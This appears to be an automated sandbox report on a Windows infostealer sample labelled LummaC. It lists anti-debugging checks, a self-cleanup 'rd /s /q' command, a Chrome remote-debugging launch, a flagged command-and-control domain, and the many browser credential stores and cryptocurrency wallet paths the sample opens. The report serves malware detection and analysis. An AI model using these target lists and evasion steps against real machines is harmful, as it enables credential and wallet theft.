          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401325 mov eax, dword ptr fs:[00000030h]0_2_00401325
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012DC test dword ptr fs:[00000030h], 00000068h0_2_004012DC
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012ED mov eax, dword ptr fs:[00000030h]0_2_004012ED
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004012BE mov eax, dword ptr fs:[00000030h]0_2_004012BE
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B0D90 mov eax, dword ptr fs:[00000030h]0_2_009B0D90
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B158C mov eax, dword ptr fs:[00000030h]0_2_009B158C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B092B mov eax, dword ptr fs:[00000030h]0_2_009B092B
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1525 mov eax, dword ptr fs:[00000030h]0_2_009B1525
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1554 mov eax, dword ptr fs:[00000030h]0_2_009B1554
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B1543 test dword ptr fs:[00000030h], 00000068h0_2_009B1543
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00A29C23 push dword ptr fs:[00000030h]0_2_00A29C23
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00401458 HeapAlloc,GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,0_2_00401458

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004152A5
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C5468 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009C5468
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C550C CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009C550C
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HLXLFCBI" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009C413E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0041FC76 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041FC76
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00413D91 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00413D91
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C40BB GetProcessHeap,GetTimeZoneInformation,0_2_009C40BB
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.30.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \ElectronCash\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: window-state.json
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: ElectrumLTC
          Source: dZKPE9gotO.exeString found in binary or memory: |*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco
          Source: dZKPE9gotO.exeString found in binary or memory: \Ethereum\
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\
          Source: dZKPE9gotO.exeString found in binary or memory: Ethereum
          Source: dZKPE9gotO.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
          Source: dZKPE9gotO.exeString found in binary or memory: \Exodus\exodus.wallet\
          Source: dZKPE9gotO.exeString found in binary or memory: MultiDoge
          Source: dZKPE9gotO.exeString found in binary or memory: seed.seco
          Source: dZKPE9gotO.exeString found in binary or memory: keystore
          Source: dZKPE9gotO.exeString found in binary or memory: \Electrum-LTC\wallets\
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR

          Remote Access Functionality

          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Create Account | 1 Extra Window Memory Injection | 22 Software Packing | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 111 Process Injection | 1 DLL Side-Loading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 11 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
          [Behavior graph: ID 1576158; Sample: dZKPE9gotO.exe; Start date: 16/12/2024; Architecture: WINDOWS; Score: 100]

          Source | Detection | Scanner | Label | Link
          dZKPE9gotO.exe | 76% | ReversingLabs | Win32.Trojan.LummaC |
          dZKPE9gotO.exe | 100% | Avira | HEUR/AGEN.1312567 |
          dZKPE9gotO.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://sedone.online/CWz# | 100% | Avira URL Cloud | malware |
          https://sedone.online/oWF# | 100% | Avira URL Cloud | malware |
          http://anglebug.com/3205er | 0% | Avira URL Cloud | safe |
          https://sedone.online | 100% | Avira URL Cloud | malware |
          https://sedone.online/pW | 100% | Avira URL Cloud | malware |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high
          t.me | 149.154.167.99 | true | false | | high
          ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
          sb.scorecardresearch.com | 18.165.220.106 | true | false | | high
          www.google.com | 172.217.21.36 | true | false | | high
          sedone.online | 116.203.12.114 | true | false | | high
          s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
          googlehosted.l.googleusercontent.com | 142.250.181.65 | true | false | | high
          clients2.googleusercontent.com | unknown | unknown | false | | high
          bzib.nelreports.net | unknown | unknown | false | | high
          assets.msn.com | unknown | unknown | false | | high
          deff.nelreports.net | unknown | unknown | false | | high
          ntp.msn.com | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                        https://sedone.online/CWz#dZKPE9gotO.exe, 00000000.00000003.1416494529.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://anglebug.com/5371chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/4722chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566326820.0000782402EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
